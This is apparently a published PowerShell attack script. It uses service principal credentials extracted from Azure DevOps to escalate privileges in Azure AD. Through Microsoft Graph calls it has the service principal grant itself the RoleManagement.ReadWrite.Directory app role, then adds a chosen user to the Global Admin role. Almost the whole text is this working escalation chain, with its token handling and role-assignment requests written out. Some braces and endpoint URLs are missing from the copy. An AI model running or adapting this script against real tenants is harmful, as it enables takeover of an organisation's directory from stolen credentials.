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Created June 6, 2022 17:54
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# Author: Marius Elmiger (@m8r1us)
# Description: Use extracted DevOps Credentials from a Service Principal to grant Global Admin rights by chaining AppRoleAssignment.ReadWrite.All with RoleManagement.ReadWrite.Directory
# The script includes code from from (@_wald0)
# 1 The Azure AD User I want to add to GA Role (objectid)
$userToAddToGa = "3bffb11a-b991-4d1f-....."
# 2 Extracted information from Azure DevOps
$applicationId = "64396535663062302D666163392D....."
$servicePrincipalKey = "506D7A4C3346494C7651524A706E6567656254....."
$tenantId = "d2fa7646-d9d8-....."
# Helper function to let us parse Azure JWTs:
function Parse-JWTtoken {
Decodes a JWT token. This was taken from link below. Thanks to Vasil Michev.
[Parameter(Mandatory = $True)]
#Validate as per
#Access and ID tokens are fine, Refresh tokens will not work
if (-not $Token.Contains(".") -or -not $Token.StartsWith("eyJ")) {
Write-Error "Invalid token" -ErrorAction Stop
$tokenheader = $Token.Split(".")[0].Replace('-', '+').Replace('_', '/')
#Fix padding as needed, keep adding "=" until string length modulus 4 reaches 0
while ($tokenheader.Length % 4) {
Write-Verbose "Invalid length for a Base-64 char array or string, adding ="
$tokenheader += "="
Write-Verbose "Base64 encoded (padded) header: $tokenheader"
#Convert from Base64 encoded string to PSObject all at once
Write-Verbose "Decoded header:"
$header = ([System.Text.Encoding]::ASCII.GetString([system.convert]::FromBase64String($tokenheader)) | convertfrom-json)
$tokenPayload = $Token.Split(".")[1].Replace('-', '+').Replace('_', '/')
#Fix padding as needed, keep adding "=" until string length modulus 4 reaches 0
while ($tokenPayload.Length % 4) {
Write-Verbose "Invalid length for a Base-64 char array or string, adding ="
$tokenPayload += "="
Write-Verbose "Base64 encoded (padded) payoad: $tokenPayload"
$tokenByteArray = [System.Convert]::FromBase64String($tokenPayload)
$tokenArray = ([System.Text.Encoding]::ASCII.GetString($tokenByteArray) | ConvertFrom-Json)
#Converts $header and $tokenArray from PSCustomObject to Hashtable so they can be added together.
#I would like to use -AsHashTable in convertfrom-json. This works in pwsh 6 but for some reason Appveyor isnt running tests in pwsh 6.
$headerAsHash = @{}
$tokenArrayAsHash = @{}
$ | ForEach-Object { $headerAsHash[$_.Name] = $_.Value }
$ | ForEach-Object { $tokenArrayAsHash[$_.Name] = $_.Value }
$output = $headerAsHash + $tokenArrayAsHash
Write-Output $output
# Helper converter functions
function Convert-HexToBytes {
$HEX = $HEX -split '(..)' | ? { $_ }
ForEach ($value in $HEX){
function Convert-AsciiToHex(){
$c = ''
$b = $a.ToCharArray();
Foreach ($element in $b) {
$c = $c + " " + [System.String]::Format("{0:X}", [System.Convert]::ToUInt32($element))
return $c -replace ' '
function Convert-HexToAscii() {
$a -split '(..)' | ? { $_ } | forEach {[char]([convert]::toint16($_,16))} | forEach {$result = $result + $_}
return $result
function Convert-BytesToHEX {
$tmp = ''
ForEach ($value in $DEC){
$a = "{0:x}" -f [Int]$value
if ($a.length -eq 1){
$tmp += '0' + $a
} else {
$tmp += $a
return $tmp
# Start of the Script
# Convert Hex to Ascii
$applicationId = Convert-HexToAscii($applicationId)
Write-Host "[*] Application Id: $($applicationId)"
$servicePrincipalKey = Convert-HexToAscii($servicePrincipalKey)
Write-Host "[*] Application Key: $($servicePrincipalKey.substring(0,8))..."
# Using the extracted password and connect to Azure
Write-Host "[*] Connect-AzAccount: Connect with Application Id: $($applicationId)"
$spPassword = ConvertTo-SecureString $servicePrincipalKey -AsPlainText -Force
$psCred = New-Object System.Management.Automation.PSCredential($applicationId, $spPassword)
Connect-AzAccount -Credential $psCred -TenantID $tenantId -ServicePrincipal | Out-Null
# Check to see if we're logged in with Az
Write-Host "[+] Login to Azure AZ..."
$LoginStatus = Get-AzContext *>&1
# Get a MS graph token for the service principal
Write-Host "[+] Get MS Graph Token"
$APSUser = Get-AzContext *>&1
$resource = ""
$token = [Microsoft.Azure.Commands.Common.Authentication.AzureSession]::Instance.AuthenticationFactory.Authenticate(`
$APSUser.Account, `
$APSUser.Environment, `
$APSUser.Tenant.Id.ToString(), `
$null, `
[Microsoft.Azure.Commands.Common.Authentication.ShowDialog]::Never, `
$null, `
Write-Host "[*] Assigned Approles:" (Parse-JWTtoken $token).roles
Write-Host "[*] Get ServicePrincipal Id of the Application"
$serviceprincipalId = Get-AzADServicePrincipal -ApplicationId $applicationId | select-object -ExpandProperty id
Write-Host "[*] ServicePrincipal Id: $($serviceprincipalId)"
Write-Host "[*] Get AppRoles of the ServicePrincipal and extract the Resource Id"
#MS Graph API endpoint is currently not support filters based on appRoleId...
#<id>/appRoleAssignments?$filter=appRoleId eq '06b708a9-e830-4db3-a914-8e69da51d44f'
$apiUrl = "$($serviceprincipalId)/appRoleAssignments?`$select=appRoleId,resourceId"
Try {
$Data = Invoke-RestMethod -Headers @{Authorization = "Bearer $($token)" } -Uri $apiUrl -Method Get
Write-Error $Error[0]
$approles = ($Data | select-object Value).Value
if ($approles.appRoleId -contains "9e3f62cf-ca93-4989-b6ce-bf83c28f9fe8")
Write-Host "[*] AppRole RoleManagement.ReadWrite.Directory: $($approle.appRoleId) already assigned"
$roleManagementAssigned = 1
elseif ($approles.appRoleId -contains "06b708a9-e830-4db3-a914-8e69da51d44f")
$approles | ForEach-Object {
$approle = $_
$resourceId = $approle.ResourceId
Write-Host "[*] Resource Id found: $($resourceId)"
$roleManagementAssigned = 0
Write-Host "[*] AppRoleAssignment.ReadWrite.All AppRole not assigned to the ServicePrincipal: $($serviceprincipalId)"
if (!$roleManagementAssigned)
# Grant the service principal the "RoleManagement.ReadWrite.Directory" MS Graph app role
# 9e3f62cf-ca93-4989-b6ce-bf83c28f9fe8 # RoleManagement.ReadWrite.Directory -> directly promote yourself to GA
# 06b708a9-e830-4db3-a914-8e69da51d44f # AppRoleAssignment.ReadWrite.All -> grant yourself the RoleManagement.ReadWrite.Directory role, then promote to GA
Write-Host "[+] Assign RoleManagement.ReadWrite.Directory AppRole to $($servicePrincipalId)"
$body = @{
principalId = $servicePrincipalId
resourceId = $resourceId # Microsoft Graph SP ID
appRoleId = "9e3f62cf-ca93-4989-b6ce-bf83c28f9fe8" # RoleManagement.ReadWrite.Directory
Invoke-RestMethod -Headers @{Authorization = "Bearer $($token)" } `
-Uri "$($servicePrincipalId)/appRoleAssignedTo" `
-Method POST `
-Body $($body | ConvertTo-Json) `
-ContentType 'application/json' | Out-Null
Write-Warning $Error[0]
# Wait for the assignment
Write-Host "[*] Wait 20 seconds..."
sleep 20
# Get a new graph token for the service principal
Write-Host "[+] Get a new graph token for the service principal"
$APSUser = Get-AzContext *>&1
$resource = ""
$token = [Microsoft.Azure.Commands.Common.Authentication.AzureSession]::Instance.AuthenticationFactory.Authenticate(`
$APSUser.Account, `
$APSUser.Environment, `
$APSUser.Tenant.Id.ToString(), `
$null, `
[Microsoft.Azure.Commands.Common.Authentication.ShowDialog]::Never, `
$null, `
Write-Host "[*] Assigned Approles: " (Parse-JWTtoken $token).roles
# Check if user is already member of the role
# GA Template id (The same overall Tenants): 62e90394-69f5-4237-9190-012177145e10
Write-Host "[*] Query Global Admin object id"
$apiUrl = "`$filter=roleTemplateId eq '62e90394-69f5-4237-9190-012177145e10'&`$select=id"
try {
$Data = Invoke-RestMethod -Headers @{Authorization = "Bearer $($token)" } -Uri $apiUrl -Method Get
Write-Error $Error[0]
$globalAdminId = ($Data | select-object Value)
Write-Host "[*] Query Global Admin members"
$apiUrl = "$($globalAdminId)/members?`$select=id,userPrincipalName"
try {
$Data = Invoke-RestMethod -Headers @{Authorization = "Bearer $($token)" } -Uri $apiUrl -Method Get
Write-Error $Error[0]
$globalAdminMembers = ($Data | select-object Value)
# Check if User is already GA
if ($globalAdminMembers -contains $userToAddToGa)
Write-Host "[*] $($userToAddToGa) is already Member of the GA Role"
# Now we use our new "RoleManagement.ReadWrite.Directory" app role to promote $userToAddToGa to Global Admin
Write-Host "[+] Add User $($userToAddToGa) to Global Admin"
$body = @{
""= "$($userToAddToGa)"
try {
Invoke-RestMethod -Headers @{Authorization = "Bearer $($token)" } `
-Uri "$($globalAdminId)/members/`$ref" `
-Method POST `
-Body $($body | ConvertTo-Json) `
-ContentType 'application/json' | Out-Null
} Catch {
Write-Error $Error[0]
# Get rid of any tokens or Azure connections in this PowerShell instance
Write-Host "[*] Disconnect from AzureAD and Azure ARM"
$token = $null
# Connect with the new GA User
$confirmation = Read-Host "[>] Do you want to connect with the new GA User? (y/n)"
if ($confirmation -eq 'y') {
# Connect to Azure AD with $userToAddToGa
Write-Host "[+] Connect to AzureAD with user $userToAddToGa"
# Check Role Membership of $userToAddToGa
Write-Host "[*] Show AzureAD roles of the User"
Get-AzureADDirectoryRoleMember -ObjectID $($globalAdminId) | select DisplayName
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